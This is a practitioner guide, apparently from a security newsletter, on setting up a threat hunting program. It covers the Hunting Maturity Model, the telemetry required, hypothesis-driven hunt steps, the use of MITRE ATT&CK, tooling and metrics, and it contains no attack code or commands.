How to Build a Threat Hunting Program: A Practitioner Guide
Alert-driven security operations are reactive by design: an analyst investigates an alert after something has already happened. Threat hunting inverts this model. Hunters proactively search for attacker behavior in the environment before it triggers an alert — or specifically in the techniques designed to avoid triggering alerts at all. The premise is that sophisticated adversaries are already inside most enterprise environments, moving quietly, and that hunting based on attacker TTPs rather than indicator signatures is what finds them. This guide covers how to stand up a threat hunting program, what data and tooling it requires, and how to structure and measure the effort.
Hunting Maturity: Where to Start
Hunting programs exist on a maturity spectrum. Attempting advanced analytics-driven hunting without the foundational data infrastructure produces wasted effort. The Hunting Maturity Model (HMM) provides a framework for assessing current capability and prioritizing investments.
HMM Level 0 — Initial (no hunting)
Fully dependent on automated alerts. No proactive search capability. Security posture: reactive. Data: whatever the SIEM receives. Starting point for most organizations.
HMM Level 1 — Minimal (IOC-based hunting)
Searching for known indicators: IP addresses, domain names, file hashes from threat intelligence feeds. Better than nothing, but IOC-based hunting is trivially evaded by attackers who cycle infrastructure.
HMM Level 2 — Procedural (TTP-based hunting)
Hunting based on attacker techniques from MITRE ATT&CK rather than indicators. Searches for behavioral patterns: unusual parent-child process relationships, specific registry key modifications, suspicious PowerShell execution patterns. More durable than IOC hunting — TTPs change slowly.
HMM Level 3 — Innovative (hypothesis-driven hunting)
Forming and testing novel hypotheses about attacker behavior based on threat intelligence, environmental knowledge, and analytical reasoning. Produces new detection logic rather than consuming existing playbooks. Requires senior analyst capability.
HMM Level 4 — Leading (automated hunting)
Machine learning models identify statistical anomalies that humans investigate. Hypothesis generation becomes partially automated. Requires significant data science investment on top of mature hunting infrastructure.
Data Requirements: The Hunting Foundation
Threat hunting is only as good as the data available to search. Before investing in hunters, invest in logging. The most common hunting program failure mode is hunters who cannot find what they are looking for because the relevant data was never collected.
Process execution telemetry
Full process execution history with command lines, parent-child relationships, and hashes is the single most valuable hunting data source. Windows: Sysmon Event IDs 1, 10, 11, 13 or EDR process telemetry. Linux: auditd, eBPF, or EDR process events. Without this, most TTP-based hunting is impossible.
Network flow data
NetFlow or equivalent (IPFIX, S-Flow) for all significant network segments. DNS query logs from all internal resolvers. HTTP/HTTPS proxy logs. These enable hunting for C2 communication, lateral movement, and data exfiltration — attack phases that happen on the network.
Authentication logs
Windows Security event logs (4624, 4625, 4648, 4768, 4769, 4776) and Active Directory logs are essential for hunting credential-based attacks, lateral movement, and privilege escalation. Cloud identity logs (Entra ID sign-in logs, AWS CloudTrail) are equally essential in hybrid environments.
Endpoint telemetry retention
Hunters need history. An adversary with 30-day dwell time requires at least 90 days of searchable endpoint telemetry to reconstruct the attack chain. Most EDRs retain telemetry for 7-30 days by default; configure extended retention or ship to a SIEM/data lake.
Cloud and SaaS audit logs
Adversaries targeting cloud credentials hunt in SaaS applications and cloud management planes. AWS CloudTrail, Azure Activity Logs, Google Cloud Audit Logs, and M365 Unified Audit Log are required data sources for any organization with significant cloud footprint.
Briefings like this, every morning before 9am.
Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.
The Hunting Methodology: Hypothesis-Driven Hunting
Hypothesis-driven hunting is the most mature and effective hunting methodology. A hypothesis is a testable statement about attacker behavior: 'If an attacker is using Living-off-the-Land techniques for lateral movement in this environment, we would expect to see mshta.exe or wscript.exe executing remote HTA files from unexpected parent processes.' The hunt tests the hypothesis by searching the data for evidence of that behavior.
Step 1 — Hypothesis formation
Hypotheses come from: MITRE ATT&CK technique mappings to relevant threat actors, current threat intelligence about active campaigns, gap analysis of existing detection coverage (what are we not alerting on?), environmental knowledge (what are our critical assets, what would an attacker target?), and recent incidents or near-misses. Write the hypothesis explicitly before searching.
Step 2 — Data collection and scoping
Identify which data sources are relevant to the hypothesis. Scope the hunt to a manageable time window and asset set initially; expand if initial scope yields interesting findings. Undefined scope leads to indefinite hunts that produce no output.
Step 3 — Investigation and analysis
Execute queries against the data. For TTP-based hunts, this means querying for the specific behavioral patterns the technique produces. Compare findings against baseline: is this process execution pattern normal for this environment? Statistical analysis of process parent-child pairs, network connection frequencies, and user behavior patterns identifies anomalies.
Step 4 — Finding classification
Classify findings as: True Positive (active threat), Benign (legitimate activity, possibly misconfigured or unusual), or Gap (no data, cannot determine). True positives escalate to incident response. Benign findings inform future hunting (reduce noise). Gaps identify data collection improvements.
Step 5 — Output creation
Every completed hunt should produce output: a new detection rule, an updated playbook, a data collection improvement, or documented environmental baseline knowledge. Hunts that produce no lasting artifact waste the investment. This is the mechanism by which hunting improves the broader security program over time.
Hunting with MITRE ATT&CK
MITRE ATT&CK provides the most structured framework for TTP-based hunting. The Enterprise ATT&CK matrix covers 14 tactics and hundreds of techniques with detailed procedure examples, data source requirements, and detection suggestions.
Coverage mapping
Map your current detection rules against ATT&CK techniques to identify gaps — techniques with no current detection coverage. These gaps are the highest-priority hunting targets: adversaries using uncovered techniques are invisible to your automated detection.
Threat actor profiling
ATT&CK includes profiles of known threat actor groups with their commonly used techniques. Hunt for techniques used by threat actors relevant to your industry and threat model. A manufacturing company concerned about APT40 hunts differently than a financial institution focused on FIN7.
ATT&CK Navigator
ATT&CK Navigator is a free web-based tool for visualizing coverage against the ATT&CK matrix. Create layers showing which techniques are covered by detection rules, which have been hunted, and which remain gaps. This visualization communicates hunting prioritization to leadership and drives program planning.
Technique-specific hunt playbooks
Develop documented hunt playbooks for high-priority ATT&CK techniques: the data sources required, the specific queries to run, what normal looks like, and what anomalies are suspicious. Documented playbooks allow junior hunters to execute established hunts consistently and senior hunters to focus on novel hypothesis development.
Tooling for Threat Hunters
Effective hunting requires tools that support interactive, iterative data exploration — different from SIEM alerting dashboards designed for alert triage.
Data platform for hunting queries
Hunters need a query interface with full-text search, field extraction, statistical aggregation, and time-series analysis. Splunk, Elastic, Microsoft Sentinel, and dedicated threat hunting platforms (Hunters.ai, Palo Alto Cortex XDR) all support hunting workflows. The key capability is ad-hoc query speed across months of data.
Timeline and process tree visualization
Process trees showing parent-child relationships and execution timelines are essential for understanding attack sequences. CrowdStrike's Falcon Investigate, SentinelOne's Deep Visibility, and Microsoft Defender's investigation graph provide this natively from their EDR telemetry.
YARA for malware artifact hunting
YARA rules scan for malware characteristics in files and memory. Hunters use YARA to retrospectively scan historical file system artifacts and memory dumps for indicators of specific malware families. retrohunt capability in VirusTotal allows hunting across the world's largest malware corpus.
Velociraptor
Velociraptor is an open source DFIR and endpoint monitoring platform. It enables hunters to remotely collect specific artifacts (prefetch files, shimcache, MFT entries, memory strings) from endpoints at scale, supporting forensic hunting across large fleets without full memory dump collection.
Measuring Hunt Program Effectiveness
Hunting programs that cannot demonstrate value lose budget. The metrics that matter are outcomes, not activities.
Threats discovered
Count of true positive findings from hunts, categorized by severity. This is the primary value metric. A program that discovers zero threats after multiple hunt cycles should examine whether the hypothesis selection is surfacing high-probability scenarios or avoiding hard problems.
New detections created
Count of new detection rules added to the SIEM or EDR as a result of hunting. This is the compound value — hunting improvements persist in automated detection after the hunt concludes.
ATT&CK coverage improvement
Track the percentage of relevant ATT&CK techniques covered by automated detection before and after each hunt cycle. Coverage should increase as hunting converts gaps into detections.
Mean time to detect improvement
Compare MTTD for threat categories that have been actively hunted against those that have not. Hunted categories should show lower MTTD over time as hunting produces better detection logic.
The bottom line
Threat hunting is the proactive complement to reactive alert-driven security operations. It finds adversaries who have bypassed automated detection and converts hunting discoveries into permanent detection improvements. Starting with a clear maturity assessment, investing in the right data collection, and rigorously applying hypothesis-driven methodology produces measurable reduction in breach dwell time and continuous improvement in detection coverage. Every hunt should leave the program better than it started.
Frequently asked questions
What is threat hunting?
Threat hunting is the proactive search for attackers already present in an environment who have evaded automated detection. Unlike alert-driven SOC operations that respond to triggered rules, hunters form hypotheses about attacker behavior and actively search for evidence of that behavior in telemetry data — without waiting for an alert. The goal is to find threats before they achieve their objectives and to convert hunting findings into new automated detections.
How is threat hunting different from incident response?
Incident response is reactive: it starts after a threat is identified (typically via an alert). Threat hunting is proactive: it starts without a confirmed threat, searching for evidence that a threat may be present. A hunt may conclude with no findings (the hypothesis was not confirmed in this environment), identify a true positive that then initiates incident response, or identify detection gaps without active threats. They are complementary, not competing, functions.
What data sources are most important for threat hunting?
The highest-value hunting data sources are: (1) process execution telemetry with command lines and parent-child relationships (Sysmon or EDR), (2) DNS query logs from all internal resolvers, (3) Windows authentication events (4624, 4648, 4768, 4769), (4) network flow data, and (5) proxy/web gateway logs. Without detailed process execution telemetry, most TTP-based hunting is not possible.
How does MITRE ATT&CK support threat hunting?
ATT&CK provides a structured taxonomy of adversary techniques organized by tactic (what attackers are trying to achieve) and technique (how they achieve it). For hunting, ATT&CK is used to: identify detection gaps (which techniques have no current detection coverage), prioritize hunting targets (which gaps are most likely exploited by relevant threat actors), and write hypothesis statements (specific ATT&CK techniques predict specific observable behaviors). ATT&CK Navigator visualizes coverage gaps across the full matrix.
How many FTEs does a threat hunting program require?
A minimal hunting program can be operated by a single senior analyst dedicating 20-30% of their time to hunting alongside alert investigation duties. A dedicated hunt team typically starts with 2-3 analysts — one senior hunter to develop hypotheses and one or two mid-level analysts to execute established hunt playbooks. Large organizations with mature programs may have 5-10 dedicated hunters plus data engineering support. The bigger constraint is usually data infrastructure and tooling maturity, not headcount.
What is the Hunting Maturity Model?
The Hunting Maturity Model (HMM) describes five levels of hunting capability from Level 0 (no hunting, fully reactive) through Level 4 (automated anomaly detection with ML). Level 1 is IOC-based hunting (searching for known indicators). Level 2 is TTP-based hunting (searching for technique patterns). Level 3 is hypothesis-driven hunting (forming and testing novel hypotheses). Most programs should target Level 2-3 before investing in Level 4 ML capabilities, which require data science expertise and large labeled datasets.
Sources & references
Free resources
Critical CVE Reference Card 2025–2026
25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.
Ransomware Incident Response Playbook
Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.
The Mythos Brief is free.
AI that finds 27-year-old zero-days. What it means for your security program.